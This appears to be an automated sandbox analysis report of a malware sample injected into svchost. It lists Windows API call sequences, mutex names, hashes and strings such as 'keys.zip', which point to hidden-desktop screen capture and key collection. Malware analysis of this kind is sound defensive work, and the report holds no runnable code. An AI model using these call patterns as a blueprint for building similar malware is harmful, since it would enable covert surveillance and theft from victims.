                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                            • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                            • API String ID: 2466897691-3547598143
                                                                                                                                                                                                            • Opcode ID: a2de0311593b83e19bab61a1b851fb9f8a9320d1bfd5ea6f19e30cd09f312231
                                                                                                                                                                                                            • Instruction ID: 8eefb0f407ac36fa6f6afb46c2e1072f14246f73863aaabdf619568f93586068
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2de0311593b83e19bab61a1b851fb9f8a9320d1bfd5ea6f19e30cd09f312231
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74018671BC435676B91231751C0AF4B972E4EC0ED5F9206B4FC12F2444DB96E20388B8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 02C7B9ED
                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 02C7B9FC
                                                                                                                                                                                                              • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 02C7BA39
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02C7BA42
                                                                                                                                                                                                            • PrintWindow.USER32(00000000,?,00000000,?,755730D0,?,?,?,02C7843E), ref: 02C7BA55
                                                                                                                                                                                                            • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,755730D0,?,?,?,02C7843E), ref: 02C7BA7B
                                                                                                                                                                                                            • CreateRectRgn.GDI32(?,?,02C7843E,?), ref: 02C7BA91
                                                                                                                                                                                                            • GetWindowRgn.USER32(00000000,00000000), ref: 02C7BA9B
                                                                                                                                                                                                            • OffsetRgn.GDI32(00000000,?,?), ref: 02C7BAB5
                                                                                                                                                                                                            • SelectClipRgn.GDI32(?,00000000), ref: 02C7BAC0
                                                                                                                                                                                                            • BitBlt.GDI32(?,?,?,02C7843E,?,?,00000000,00000000,00CC0020), ref: 02C7BAE9
                                                                                                                                                                                                            • SelectClipRgn.GDI32(?,00000000), ref: 02C7BAF2
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02C7BAF5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3597830993-0
                                                                                                                                                                                                            • Opcode ID: 67a26ccbdca2ca42c6637e339f99ddf5f65e0949e96558e05bc8d35b703e6993
                                                                                                                                                                                                            • Instruction ID: e0fbb222fdb7a689cd4738f8298ab91a3c5c0875cd4c5c97c898b7d6531adc1c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67a26ccbdca2ca42c6637e339f99ddf5f65e0949e96558e05bc8d35b703e6993
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4315E71E80114AFD715EBA5DC89FBF7BB8EF89B14F104648FA01A3180DB74AD118A70
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C7CAA8
                                                                                                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAB9
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: GetComputerNameA.KERNEL32(02CBD6A8,?), ref: 02C7CA07
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: lstrlenA.KERNEL32(02CBD6A8,?,?,02C861D1), ref: 02C7CA12
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA52
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA62
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA72
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA7F
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA8C
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CBD6C0), ref: 02C7CAE3
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAFC
                                                                                                                                                                                                              • Part of subcall function 02C780B0: SetThreadDesktop.USER32(?,7556F590,755616B0,00000000), ref: 02C780BF
                                                                                                                                                                                                              • Part of subcall function 02C780B0: GetDC.USER32(00000000), ref: 02C780C7
                                                                                                                                                                                                              • Part of subcall function 02C780B0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C780D8
                                                                                                                                                                                                              • Part of subcall function 02C780B0: GetDeviceCaps.GDI32(00000000,00000008), ref: 02C780E9
                                                                                                                                                                                                              • Part of subcall function 02C780B0: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C78100
                                                                                                                                                                                                              • Part of subcall function 02C780B0: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C78142
                                                                                                                                                                                                              • Part of subcall function 02C780B0: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C78152
                                                                                                                                                                                                              • Part of subcall function 02C780B0: DeleteObject.GDI32(00000000), ref: 02C78155
                                                                                                                                                                                                              • Part of subcall function 02C780B0: ReleaseDC.USER32(00000000,00000000), ref: 02C7815E
                                                                                                                                                                                                              • Part of subcall function 02C780B0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C781B9
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C7CB29
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB3C
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,02CBD790,?,?,02C77262,00000000,00000000), ref: 02C7CB5A
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB6B
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,02CBD750,?,?,02C77262,00000000,00000000), ref: 02C7CB7F
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB98
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBAB
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBBE
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,02CBD6FC,?,?,02C77262,00000000,00000000), ref: 02C7CBD4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$wsprintf$EventFile$Mutex$BitsCapsDeviceHeapMappingView$BitmapCompatibleComputerCountDeleteDesktopFreeNameObjectReleaseThreadTicklstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2940656088-0
                                                                                                                                                                                                            • Opcode ID: a3c7da03c06e7baacfa3e58cff91971bdf7a1da4547cc210a681c6769fa2a69e
                                                                                                                                                                                                            • Instruction ID: 7143cfbcd07b478516294d572ce1f76d00f89f23f1645128c4751ac3e455c077
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3c7da03c06e7baacfa3e58cff91971bdf7a1da4547cc210a681c6769fa2a69e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37315870FC47067AFA625B799C43F552A98AB84F11F240A67B705FE1C1DAE0E2108A69
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA,?,76C0BF00), ref: 02C8F8A0
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,76C0BF00), ref: 02C8F8E1
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,76C0BF00), ref: 02C8F8EB
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8F8F3
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F904
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,76C0BF00), ref: 02C8F90B
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,76C0BF00), ref: 02C8F918
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA,?,?,?,76C0BF00), ref: 02C8F987
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: 6D1DA0AA$keys.zip$path1.txt
                                                                                                                                                                                                            • API String ID: 1373881290-3488207752
                                                                                                                                                                                                            • Opcode ID: 995880c70c9912810f1758e375a2811a9e2a576be5440f13094ddfdcdb918970
                                                                                                                                                                                                            • Instruction ID: 29d7d588c098d824c285a5ef575a4294df5b1a72b2e407bb19de8d166829a7dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 995880c70c9912810f1758e375a2811a9e2a576be5440f13094ddfdcdb918970
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E415B315002455FCB16DF2498A87E7BBE9EF85304F54C5E8D9C9C7600EB70DA49C790
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA6D0), ref: 02C921B0
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C921F1
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C921FB
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C92203
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92214
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C9221B
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92228
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA6D0,?,02C923DC), ref: 02C92297
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: 6D1DA6D0$keys.zip$path1.txt
                                                                                                                                                                                                            • API String ID: 1373881290-2594074195
                                                                                                                                                                                                            • Opcode ID: bad6e884dcd6c20827d84814306d4c4b625bec54e46aebd30b1b17291ffe3891
                                                                                                                                                                                                            • Instruction ID: af73b95f3afc7f7d0884e6785d3ddf53a614609f7025e591714c5bd7d1cea629
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bad6e884dcd6c20827d84814306d4c4b625bec54e46aebd30b1b17291ffe3891
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D4114719046455FCF168B24AC9CBEABBE9EF85300F148694EDC9C7201EB71CA58CB91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A8C3
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7A8F0
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7A8F7
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7A909
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7A918
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7A922
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A934
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7A961
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7A968
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,?), ref: 02C7A97B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2596333622-465009422
                                                                                                                                                                                                            • Opcode ID: 6732ab873021143345105f0ae7f6a40ba091e59bea1e656974525272d65fe9d3
                                                                                                                                                                                                            • Instruction ID: 11d871deff8ae8ac6c3bb86cc3c047be6394bae5bf7a145b80572d6ccf4b0d3c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6732ab873021143345105f0ae7f6a40ba091e59bea1e656974525272d65fe9d3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4621E231A80210AFC7028B65E84CFABBBA8FFD8721F054BB6F118C7251CB705561CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C736A1
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,7744C3F0,02C8599A), ref: 02C736B4
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C736C0
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C736ED
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,7744C3F0,02C8599A), ref: 02C736FA
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C73706
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C73739
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick$_snprintf
                                                                                                                                                                                                            • String ID: %x%x$3abfb9076ff185e9$RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 3150073801-2212728350
                                                                                                                                                                                                            • Opcode ID: 16fb7404595c9f76e062ddb822cafc78445c59f754da67f144b58160114fee1f
                                                                                                                                                                                                            • Instruction ID: d3b5ad9f9c5bacf3d36841ec1f4113d1771ff468889bfe1a1784290c724589eb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16fb7404595c9f76e062ddb822cafc78445c59f754da67f144b58160114fee1f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E101A971FC02516FBB0E97B4DC436A2775DAF80B51B040BB6E412E3180DBA08A108561
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A32C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8A335
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A349
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8A35B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C8A366
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da3b2,ALPHA), ref: 02C8A380
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8A386
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6d1da3b2$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Wu
                                                                                                                                                                                                            • API String ID: 4280258085-877562529
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C918FC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C91905
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91919
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C9192B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C91936
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6D1DA718,RFK), ref: 02C91950
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C91956
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6D1DA718$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                            • API String ID: 4280258085-3948127742
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E8BC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8E8C5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E8D9
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8E8EB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208), ref: 02C8E8F6
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da208,HANDY), ref: 02C8E910
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8E916
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6d1da208$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0Wu
                                                                                                                                                                                                            • API String ID: 4280258085-2176744899
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WindowFromDC.USER32(?), ref: 02C7B39C
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7B3D4
                                                                                                                                                                                                            • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02C7B3E2
                                                                                                                                                                                                            • GetClipRgn.GDI32(?,00000000), ref: 02C7B3EC
                                                                                                                                                                                                            • SelectClipRgn.GDI32(00000000,00000000), ref: 02C7B3FC
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02C7B403
                                                                                                                                                                                                            • GetViewportOrgEx.GDI32(?,?), ref: 02C7B40E
                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02C7B422
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7B463
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 3315380975-465009422
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da759), ref: 02C928D7
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da759,?,?), ref: 02C92969
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02C929F5
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C92A06
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C92A0D
                                                                                                                                                                                                              • Part of subcall function 02C93E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C93E14
                                                                                                                                                                                                              • Part of subcall function 02C93E00: CloseHandle.KERNEL32(?), ref: 02C93E25
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BackslashHandleMutexPath$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                            • String ID: 6d1da759$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$keys.zip$path.txt
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                              • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                              • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                              • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                              • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
